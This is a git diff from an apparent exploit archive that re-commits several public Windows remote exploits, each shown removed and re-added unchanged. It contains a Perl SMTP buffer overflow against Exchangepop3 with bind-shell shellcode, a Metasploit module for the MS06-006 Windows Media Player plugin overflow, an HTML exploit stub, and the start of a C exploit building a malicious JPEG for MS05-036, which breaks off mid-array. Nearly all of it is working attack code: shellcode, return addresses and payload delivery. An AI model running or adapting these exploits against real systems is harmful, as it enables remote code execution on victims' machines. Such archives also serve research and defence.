diff --git a/platforms/windows/remote/1466.pl b/platforms/windows/remote/1466.pl
index eeae9f44d..3451a279a 100755
--- a/platforms/windows/remote/1466.pl
+++ b/platforms/windows/remote/1466.pl
@@ -1,61 +1,61 @@
-#!/usr/bin/perl -w        
-# for educational purposes only .   
-  use IO::Socket;
-                      if ($#ARGV<0) 
-                    { 
-                         print "\n write the target IP!! \n\n"; 
-                       exit; 
-                     } 
-                $buffer2 = "\x90"x1999999;
-                $mailf= "mail";
-                $rcptt ="rcpt to:<";
-                $buffer = "\x41"x4100;
-                $ret   = "\x80\x1d\xdc\x02";
-                $shellcode = "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33".
-                      "\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C".
-                      "\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE".
-                      "\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB".
-                      "\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77".
-                      "\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77".
-                      "\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77".
-                      "\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77".
-                      "\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77".
-                      "\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77".
-                      "\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77".
-                      "\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77".
-                      "\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77".
-                      "\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB".
-                      "\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C".
-                      "\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0".
-                      "\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77".
-                      "\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0".
-                      "\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB".
-                      "\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5".
-                      "\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98".
-                      "\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE".
-                      "\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77".
-                      "\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8".
-                      "\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF".
-                      "\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90".
-                      "\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74".
-                      "\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4".
-                      "\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94".
-                      "\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5".
-                      "\xD3\x4A\x8C\x88";
-
-                $enter  = "\x0d\x0a";
-                $connect = IO::Socket::INET ->new (Proto=>"tcp",
-                PeerAddr=> "$ARGV[0]",
-                PeerPort=>"25"); unless ($connect) { die "cant connect" }  
-                print "\nExchangepop3 v5.0  remote exploit by securma massine\n";
-                print "\n+++++++++++www.morx.org++++++++++++++++\n";              
-                $connect->recv($text,128); 
-                print "$text\n";
-                $connect->send($mailf . $enter); 
-                $connect->recv($text,128); 
-                print "$text\n";
-                $connect->send($rcptt . $buffer . $ret . $buffer2 .  $shellcode . $enter); 
-                print "\nsending exploit......\n\n";
-                 print "\ntelnet to  server port 9191 .........\n\n";
-
-# milw0rm.com [2006-02-03]
+#!/usr/bin/perl -w        
+# for educational purposes only .   
+  use IO::Socket;
+                      if ($#ARGV<0) 
+                    { 
+                         print "\n write the target IP!! \n\n"; 
+                       exit; 
+                     } 
+                $buffer2 = "\x90"x1999999;
+                $mailf= "mail";
+                $rcptt ="rcpt to:<";
+                $buffer = "\x41"x4100;
+                $ret   = "\x80\x1d\xdc\x02";
+                $shellcode = "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x83\xC0\x11\x33".
+                      "\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x03\x64\x03\x7C".
+                      "\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\xCE\x74\x77\xFE".
+                      "\x74\xE0\x06\xC6\x86\x64\x60\xD9\x89\x88\x88\x01\xCE\x4E\xE0\xBB".
+                      "\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7\xDC\x77\xDE\x4E\x01\xCE\x70\x77".
+                      "\xFE\x74\xE0\x25\x51\x8D\x46\x60\xB8\x89\x88\x88\x01\xCE\x5A\x77".
+                      "\xFE\x74\xE0\xFA\x76\x3B\x9E\x60\xA8\x89\x88\x88\x01\xCE\x46\x77".
+                      "\xFE\x74\xE0\x67\x46\x68\xE8\x60\x98\x89\x88\x88\x01\xCE\x42\x77".
+                      "\xFE\x70\xE0\x43\x65\x74\xB3\x60\x88\x89\x88\x88\x01\xCE\x7C\x77".
+                      "\xFE\x70\xE0\x51\x81\x7D\x25\x60\x78\x88\x88\x88\x01\xCE\x78\x77".
+                      "\xFE\x70\xE0\x2C\x92\xF8\x4F\x60\x68\x88\x88\x88\x01\xCE\x64\x77".
+                      "\xFE\x70\xE0\x2C\x25\xA6\x61\x60\x58\x88\x88\x88\x01\xCE\x60\x77".
+                      "\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x01\xCE\x6A\x77".
+                      "\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x01\xCE\x5E\xBB".
+                      "\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x88\x77\xDE\x7C".
+                      "\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x50\xDF\xDF\xE0".
+                      "\x8A\x88\xAB\x6F\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x64\xDF\xDB\x77".
+                      "\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x01\xCE\x36\xE0".
+                      "\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\xAC\xBB\x48\xBB".
+                      "\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5".
+                      "\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x05\xCC\xAC\x98".
+                      "\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE".
+                      "\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x77\xFE\x36\x77".
+                      "\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x88\x88\x03\xC8".
+                      "\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF".
+                      "\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90".
+                      "\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x7D\xBB\x77\x74".
+                      "\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x63\x7A\xB3\xF4".
+                      "\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\xC3\x03\xD2\x94".
+                      "\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5".
+                      "\xD3\x4A\x8C\x88";
+
+                $enter  = "\x0d\x0a";
+                $connect = IO::Socket::INET ->new (Proto=>"tcp",
+                PeerAddr=> "$ARGV[0]",
+                PeerPort=>"25"); unless ($connect) { die "cant connect" }  
+                print "\nExchangepop3 v5.0  remote exploit by securma massine\n";
+                print "\n+++++++++++www.morx.org++++++++++++++++\n";              
+                $connect->recv($text,128); 
+                print "$text\n";
+                $connect->send($mailf . $enter); 
+                $connect->recv($text,128); 
+                print "$text\n";
+                $connect->send($rcptt . $buffer . $ret . $buffer2 .  $shellcode . $enter); 
+                print "\nsending exploit......\n\n";
+                 print "\ntelnet to  server port 9191 .........\n\n";
+
+# milw0rm.com [2006-02-03]
diff --git a/platforms/windows/remote/1504.pm b/platforms/windows/remote/1504.pm
index 07a077750..9b315cc68 100755
--- a/platforms/windows/remote/1504.pm
+++ b/platforms/windows/remote/1504.pm
@@ -1,266 +1,266 @@
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::wmp_plugin_ms06_006;
-
-use strict;
-use base "Msf::Exploit";
-use Pex::Text;
-use IO::Socket::INET;
-use IPC::Open3;
-
- my $advanced =
-  {
-	'Gzip'       => [1, 'Enable gzip content encoding'],
-	'Chunked'    => [1, 'Enable chunked transfer encoding'],
-  };
-
-my $info =
-  {
-	'Name'           => 'Windows Media Player Plugin MS06-006 Overflow',
-	'Version'        => '$Revision: 1.1 $',
-	'Authors'        =>
-	  [
-		'H D Moore 
-	  Pex::Text::Freeform(qq{
-		This module exploits a vulnerability in the Windows Media Player plugin
-		for non-Microsoft web browsers. This module has been tested with Windows
-		Media Player 9 on Windows 2000 SP4, Windows XP SP2, and Windows 2003 SP0
-		(Firefox 1.5 and Opera 8.5).
-}),
-
-	'Arch'           => [ 'x86' ],
-	'OS'             => [ 'win32', 'winxp', 'win2003' ],
-	'Priv'           => 0,
-
-	'AutoOpts'       => { 'EXITFUNC' => 'process', 'GETPCTYPE' => 'ecx' },
-	'UserOpts'       =>
-	  {
-		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
-		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
-	  	'REALHOST' => [ 0, 'HOST', 'External address to use for redirects (NAT)' ],
-	  },
-
-	'Payload'        =>
-	  {
-		# give some stack space, align esp
-		'Space'     => 1024,
-		'BadChars'  => "\x00\x22".join('', map { $_=chr($_) } (0x80 .. 0xff)),
-		'MinNops'   => 0,
-		'MaxNops'   => 0,
-	  },
-	'Refs'           =>
-	  [
-	  	['CVE', '2006-0005'],
-	  	['OSVDB', '23132'],
-		['MSB', 'MS06-006'],
-		['BID', '15130'],
-	  ],
-
-	'DefaultTarget'  => 0,
-	'Targets'        =>
-	  [
-		[ 'Automatic - WMP 9.0', 0x07694b1e ]
-	  ],
-
-	'Keys'           => [ 'wmp' ],
-
-	'DisclosureDate' => 'Feb 14 2006',
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-
-sub Exploit
-{
-	my $self = shift;
-	my $server = IO::Socket::INET->new(
-		LocalHost => $self->GetVar('HTTPHOST'),
-		LocalPort => $self->GetVar('HTTPPORT'),
-		ReuseAddr => 1,
-		Listen    => 1,
-		Proto     => 'tcp'
-	  );
-	my $client;
-
-	# Did the listener create fail?
-	if (not defined($server)) {
-		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
-		return;
-	}
-
-	my $httphost = $self->GetVar('HTTPHOST');
-	$httphost = Pex::Utils::SourceIP('1.2.3.4') if $httphost eq '0.0.0.0';
-
-	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
-
-	while (defined($client = $server->accept())) {
-		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
-	}
-
-	return;
-}
-
-sub HandleHttpClient
-{
-	my $self = shift;
-	my $fd   = shift;
-
-	# Set the remote host information
-	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
-		
-
-	# Read the HTTP command
-	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
-	my $agent;
-	
-	# Read in the HTTP headers
-	while ((my $line = $fd->RecvLine(10))) {
-		
-		$line =~ s/^\s+|\s+$//g;
-		
-		my ($var, $val) = split(/\:/, $line, 2);
-
-		# Break out if we reach the end of the headers
-		last if (not defined($var) or not defined($val));
-
-		$agent = $val if $var =~ /User-Agent/i;
-	}
-
-
-	my $addr;
-
-	##
-	# XXX Does not detect Windows SP levels or WMP version :-(
-	##
-
-	# Windows NT and Windows 2000 systems
-	if ($agent =~ /Windows NT [45]\.0/) {
-		$self->PrintLine("[*] Targetting WMP v9 on NT/2000...");
-		$addr = 0x07694b1e; # wmp.dll v9.00.00.2980
-	}
-
-	# Windows XP SP2
-	if ($agent =~ /Windows NT 5\.1/) {
-		$self->PrintLine("[*] Targetting WMP v9 on XP SP2...");	
-		$addr = 0x4b5d5c74; # wmp.dll v9.00.00.3250
-	}
-	
-	# Windows 2003 SP0
-	if ($agent =~ /Windows NT 5\.2/) {
-		$self->PrintLine("[*] Targetting WMP v9 on 2003 SP0...");	
-		$addr = 0x585a6052; # wmp.dll v9.00.00.2991
-	}	
-	
-
-	my $target    = $self->Targets->[$self->GetVar('TARGET')];
-	my $shellcode = $self->GetVar('EncodedPayload')->Payload;
-	my $pattern   = "C" x 4000;
-
-	$addr = $target->[1] if ! $addr;
-	
-	# We can't use SEH getpc from inside a SEH handler on XP SP2 >:(
-	# So we do it like a drunk ninja.
-	my $getpc = 
-		"\x58\x58\x58".         # pop eax, pop eax, pop eax
-		"\x05\x18\x29\x29\x29". # add eax,0x29292917
-		"\x2d\x01\x29\x29\x29". # sub eax,0x29292901
-		"\x50\x59";             # push eax, pop ecx
-
-	substr($pattern, 2082, 4, "ABC=");       # inc, inc, inc, cmp eax, [ptr]	
-	substr($pattern, 2086, 4, pack('V', $addr));
-	substr($pattern, 2090, length($getpc), $getpc);
-	substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);
-
-	my $content   = "";
-
-	$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");
-
-	$fd->Send($self->BuildResponse($content));
-
-	# Prevents IE from throwing an error in some cases
-	select(undef, undef, undef, 0.1);
-
-	$fd->Close();
-}
-
-sub RandomHeaders {
-	my $self = shift;
-	my $head = '';
-
-	while (length($head) < 3072) {
-		$head .= "X-" .
-		  Pex::Text::AlphaNumText(int(rand(30) + 5)) . ': ' .
-		  Pex::Text::AlphaNumText(int(rand(256) + 5))  ."\r\n";
-	}
-	return $head;
-}
-
-
-sub BuildResponse {
-	my ($self, $content) = @_;
-
-	my $response =
-	  "HTTP/1.1 200 OK\r\n" .
-	  $self->RandomHeaders() .
-	  "Content-Type: text/html\r\n";
-
-	if ($self->GetVar('Gzip')) {
-		$response .= "Content-Encoding: gzip\r\n";
-		$content = $self->Gzip($content);
-	}
-	if ($self->GetVar('Chunked')) {
-		$response .= "Transfer-Encoding: chunked\r\n";
-		$content = $self->Chunk($content);
-	} else {
-		$response .= 'Content-Length: ' . length($content) . "\r\n" .
-		  "Connection: close\r\n";
-	}
-
-	$response .= "\r\n" . $content;
-
-	return $response;
-}
-
-sub Chunk {
-	my ($self, $content) = @_;
-
-	my $chunked;
-	while (length($content)) {
-		my $chunk = substr($content, 0, int(rand(10) + 1), '');
-		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
-	}
-	$chunked .= "0\r\n\r\n";
-
-	return $chunked;
-}
-
-sub Gzip {
-	my $self = shift;
-	my $data = shift;
-	my $comp = int(rand(5))+5;
-
-	my($wtr, $rdr, $err);
-
-	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
-	print $wtr $data;
-	close ($wtr);
-	local $/;
-
-	return (<$rdr>);
-}
-
-1;
-
-# milw0rm.com [2006-02-17]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::wmp_plugin_ms06_006;
+
+use strict;
+use base "Msf::Exploit";
+use Pex::Text;
+use IO::Socket::INET;
+use IPC::Open3;
+
+ my $advanced =
+  {
+	'Gzip'       => [1, 'Enable gzip content encoding'],
+	'Chunked'    => [1, 'Enable chunked transfer encoding'],
+  };
+
+my $info =
+  {
+	'Name'           => 'Windows Media Player Plugin MS06-006 Overflow',
+	'Version'        => '$Revision: 1.1 $',
+	'Authors'        =>
+	  [
+		'H D Moore 
+	  Pex::Text::Freeform(qq{
+		This module exploits a vulnerability in the Windows Media Player plugin
+		for non-Microsoft web browsers. This module has been tested with Windows
+		Media Player 9 on Windows 2000 SP4, Windows XP SP2, and Windows 2003 SP0
+		(Firefox 1.5 and Opera 8.5).
+}),
+
+	'Arch'           => [ 'x86' ],
+	'OS'             => [ 'win32', 'winxp', 'win2003' ],
+	'Priv'           => 0,
+
+	'AutoOpts'       => { 'EXITFUNC' => 'process', 'GETPCTYPE' => 'ecx' },
+	'UserOpts'       =>
+	  {
+		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
+		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
+	  	'REALHOST' => [ 0, 'HOST', 'External address to use for redirects (NAT)' ],
+	  },
+
+	'Payload'        =>
+	  {
+		# give some stack space, align esp
+		'Space'     => 1024,
+		'BadChars'  => "\x00\x22".join('', map { $_=chr($_) } (0x80 .. 0xff)),
+		'MinNops'   => 0,
+		'MaxNops'   => 0,
+	  },
+	'Refs'           =>
+	  [
+	  	['CVE', '2006-0005'],
+	  	['OSVDB', '23132'],
+		['MSB', 'MS06-006'],
+		['BID', '15130'],
+	  ],
+
+	'DefaultTarget'  => 0,
+	'Targets'        =>
+	  [
+		[ 'Automatic - WMP 9.0', 0x07694b1e ]
+	  ],
+
+	'Keys'           => [ 'wmp' ],
+
+	'DisclosureDate' => 'Feb 14 2006',
+  };
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+
+sub Exploit
+{
+	my $self = shift;
+	my $server = IO::Socket::INET->new(
+		LocalHost => $self->GetVar('HTTPHOST'),
+		LocalPort => $self->GetVar('HTTPPORT'),
+		ReuseAddr => 1,
+		Listen    => 1,
+		Proto     => 'tcp'
+	  );
+	my $client;
+
+	# Did the listener create fail?
+	if (not defined($server)) {
+		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
+		return;
+	}
+
+	my $httphost = $self->GetVar('HTTPHOST');
+	$httphost = Pex::Utils::SourceIP('1.2.3.4') if $httphost eq '0.0.0.0';
+
+	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
+
+	while (defined($client = $server->accept())) {
+		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
+	}
+
+	return;
+}
+
+sub HandleHttpClient
+{
+	my $self = shift;
+	my $fd   = shift;
+
+	# Set the remote host information
+	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
+		
+
+	# Read the HTTP command
+	my ($cmd, $url, $proto) = split(/ /, $fd->RecvLine(10), 3);
+	my $agent;
+	
+	# Read in the HTTP headers
+	while ((my $line = $fd->RecvLine(10))) {
+		
+		$line =~ s/^\s+|\s+$//g;
+		
+		my ($var, $val) = split(/\:/, $line, 2);
+
+		# Break out if we reach the end of the headers
+		last if (not defined($var) or not defined($val));
+
+		$agent = $val if $var =~ /User-Agent/i;
+	}
+
+
+	my $addr;
+
+	##
+	# XXX Does not detect Windows SP levels or WMP version :-(
+	##
+
+	# Windows NT and Windows 2000 systems
+	if ($agent =~ /Windows NT [45]\.0/) {
+		$self->PrintLine("[*] Targetting WMP v9 on NT/2000...");
+		$addr = 0x07694b1e; # wmp.dll v9.00.00.2980
+	}
+
+	# Windows XP SP2
+	if ($agent =~ /Windows NT 5\.1/) {
+		$self->PrintLine("[*] Targetting WMP v9 on XP SP2...");	
+		$addr = 0x4b5d5c74; # wmp.dll v9.00.00.3250
+	}
+	
+	# Windows 2003 SP0
+	if ($agent =~ /Windows NT 5\.2/) {
+		$self->PrintLine("[*] Targetting WMP v9 on 2003 SP0...");	
+		$addr = 0x585a6052; # wmp.dll v9.00.00.2991
+	}	
+	
+
+	my $target    = $self->Targets->[$self->GetVar('TARGET')];
+	my $shellcode = $self->GetVar('EncodedPayload')->Payload;
+	my $pattern   = "C" x 4000;
+
+	$addr = $target->[1] if ! $addr;
+	
+	# We can't use SEH getpc from inside a SEH handler on XP SP2 >:(
+	# So we do it like a drunk ninja.
+	my $getpc = 
+		"\x58\x58\x58".         # pop eax, pop eax, pop eax
+		"\x05\x18\x29\x29\x29". # add eax,0x29292917
+		"\x2d\x01\x29\x29\x29". # sub eax,0x29292901
+		"\x50\x59";             # push eax, pop ecx
+
+	substr($pattern, 2082, 4, "ABC=");       # inc, inc, inc, cmp eax, [ptr]	
+	substr($pattern, 2086, 4, pack('V', $addr));
+	substr($pattern, 2090, length($getpc), $getpc);
+	substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);
+
+	my $content   = "";
+
+	$self->PrintLine("[*] HTTP Client connected from $rhost:$rport, sending ".length($shellcode)." bytes of payload...");
+
+	$fd->Send($self->BuildResponse($content));
+
+	# Prevents IE from throwing an error in some cases
+	select(undef, undef, undef, 0.1);
+
+	$fd->Close();
+}
+
+sub RandomHeaders {
+	my $self = shift;
+	my $head = '';
+
+	while (length($head) < 3072) {
+		$head .= "X-" .
+		  Pex::Text::AlphaNumText(int(rand(30) + 5)) . ': ' .
+		  Pex::Text::AlphaNumText(int(rand(256) + 5))  ."\r\n";
+	}
+	return $head;
+}
+
+
+sub BuildResponse {
+	my ($self, $content) = @_;
+
+	my $response =
+	  "HTTP/1.1 200 OK\r\n" .
+	  $self->RandomHeaders() .
+	  "Content-Type: text/html\r\n";
+
+	if ($self->GetVar('Gzip')) {
+		$response .= "Content-Encoding: gzip\r\n";
+		$content = $self->Gzip($content);
+	}
+	if ($self->GetVar('Chunked')) {
+		$response .= "Transfer-Encoding: chunked\r\n";
+		$content = $self->Chunk($content);
+	} else {
+		$response .= 'Content-Length: ' . length($content) . "\r\n" .
+		  "Connection: close\r\n";
+	}
+
+	$response .= "\r\n" . $content;
+
+	return $response;
+}
+
+sub Chunk {
+	my ($self, $content) = @_;
+
+	my $chunked;
+	while (length($content)) {
+		my $chunk = substr($content, 0, int(rand(10) + 1), '');
+		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
+	}
+	$chunked .= "0\r\n\r\n";
+
+	return $chunked;
+}
+
+sub Gzip {
+	my $self = shift;
+	my $data = shift;
+	my $comp = int(rand(5))+5;
+
+	my($wtr, $rdr, $err);
+
+	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
+	print $wtr $data;
+	close ($wtr);
+	local $/;
+
+	return (<$rdr>);
+}
+
+1;
+
+# milw0rm.com [2006-02-17]
diff --git a/platforms/windows/remote/1505.html b/platforms/windows/remote/1505.html
index 7445f19f3..2372a73eb 100755
--- a/platforms/windows/remote/1505.html
+++ b/platforms/windows/remote/1505.html
@@ -1,105 +1,105 @@
-
-
-WMP Plugin EMBED Exploit
-
-
-
-
-
-
-
-# milw0rm.com [2006-02-17]
+
+
+WMP Plugin EMBED Exploit
+
+
+
+
+
+
+
+# milw0rm.com [2006-02-17]
diff --git a/platforms/windows/remote/1506.c b/platforms/windows/remote/1506.c
index 2c6d77a35..7e291c68c 100755
--- a/platforms/windows/remote/1506.c
+++ b/platforms/windows/remote/1506.c
@@ -1,489 +1,489 @@
-/*
-\		MS05-036 ICC Stack Overflow Exploit
-/				by Darkeagle
-\
-/	GreetZ:	all unl0ckerz, ed, f0st, uf0, sowhat, str0ke, #black, redsand
-\
-/
-\		special tnx to snooq for his PoC.
-/		
-\		
-/	xploit was tested on WinXP SP1 RUS with explorer.exe
-\
-/	02.08.05
-\
-/	http://eagle.blacksecurity.org
-\		
-*/
-
-#include 
-#include 
-#include 
-
-#define TARGET 1
-#define NOP 0x90
-#define FNAME "eagl3.jpg"
-#define BSIZE sizeof(buff)-1
-#define EIP_OFFSET 0x3A0
-#define SC_OFFSET 0x246
-#define NOP_OFFSET 0x218
-#define NOP_SIZE 0x112
-
-#define tag_content_offset 0x23E // file buffer offset craft stuff
-#define content_size_offset 0xE2 // tag content buffer size
-#define no_access_violate 0x32E // avoid access violate
-#define no_access_violate2 0x32E+12 // avoid access violate
-#define stack_land_offset ret_addr_offset+16 // reture address offset
-#define ret_addr_offset no_access_violate+8 // reture address offset
-
-/*
-* Silly JPEG stuffed with ICC profile.........
-*/
-
-char buff[]=
-"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x00\x01\x00\x60"
-"\x00\x60\x00\x00\xFF\xE2\x0C\x58\x49\x43\x43\x5F\x50\x52\x4F\x46"
-"\x49\x4C\x45\x00\x01\x01\x00\x00\x0C\x48\x4C\x69\x6E\x6F\x02\x10"
-"\x00\x00\x6D\x6E\x74\x72\x52\x47\x42\x20\x58\x59\x5A\x20\x07\xCE"
-"\x00\x02\x00\x09\x00\x06\x00\x31\x00\x00\x61\x63\x73\x70\x4D\x53"
-"\x46\x54\x00\x00\x00\x00\x49\x45\x43\x20\x73\x52\x47\x42\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xF6\xD6\x00\x01"
-"\x00\x00\x00\x00\xD3\x2D\x48\x50\x20\x20\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x63\x70\x72\x74\x00\x00"
-"\x01\x50\x00\x00\x00\x33\x64\x65\x73\x63\x00\x00\x01\x84\x00\x00"
-"\x00\x6C\x77\x74\x70\x74\x00\x00\x01\xF0\x00\x00\x00\x14\x62\x6B"
-"\x70\x74\x00\x00\x02\x04\x00\x00\x00\x14\x72\x58\x59\x5A\x00\x00"
-"\x02\x18\x00\x00\x00\xFC\x67\x58\x59\x5A\x00\x00\x02\x2C\x00\x00"
-"\x00\x14\x62\x58\x59\x5A\x00\x00\x02\x40\x00\x00\x00\x14\x64\x6D"
-"\x6E\x64\x00\x00\x02\x54\x00\x00\x00\x70\x64\x6D\x64\x64\x00\x00"
-"\x02\xC4\x00\x00\x00\x88\x76\x75\x65\x64\x00\x00\x03\x4C\x00\x00"
-"\x00\x86\x76\x69\x65\x77\x00\x00\x03\xD4\x00\x00\x00\x24\x6C\x75"
-"\x6D\x69\x00\x00\x03\xF8\x00\x00\x00\x14\x6D\x65\x61\x73\x00\x00"
-"\x04\x0C\x00\x00\x00\x24\x74\x65\x63\x68\x00\x00\x04\x30\x00\x00"
-"\x00\x0C\x72\x54\x52\x43\x00\x00\x04\x3C\x00\x00\x08\x0C\x67\x54"
-"\x52\x43\x00\x00\x04\x3C\x00\x00\x08\x0C\x62\x54\x52\x43\x00\x00"
-"\x04\x3C\x00\x00\x08\x0C\x74\x65\x78\x74\x00\x00\x00\x00\x43\x6F"
-"\x70\x79\x72\x69\x67\x68\x74\x20\x28\x63\x29\x20\x31\x39\x39\x38"
-"\x20\x48\x65\x77\x6C\x65\x74\x74\x2D\x50\x61\x63\x6B\x61\x72\x64"
-"\x20\x43\x6F\x6D\x70\x61\x6E\x79\x00\x00\x64\x65\x73\x63\x00\x00"
-"\x00\x00\x00\x00\x00\x12\x73\x52\x47\x42\x20\x49\x45\x43\x36\x31"
-"\x39\x36\x36\x2D\x32\x2E\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00"
-"\x00\x00\x12\x73\x52\x47\x42\x20\x49\x45\x43\x36\x31\x39\x36\x36"
-"\x2D\x32\x2E\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
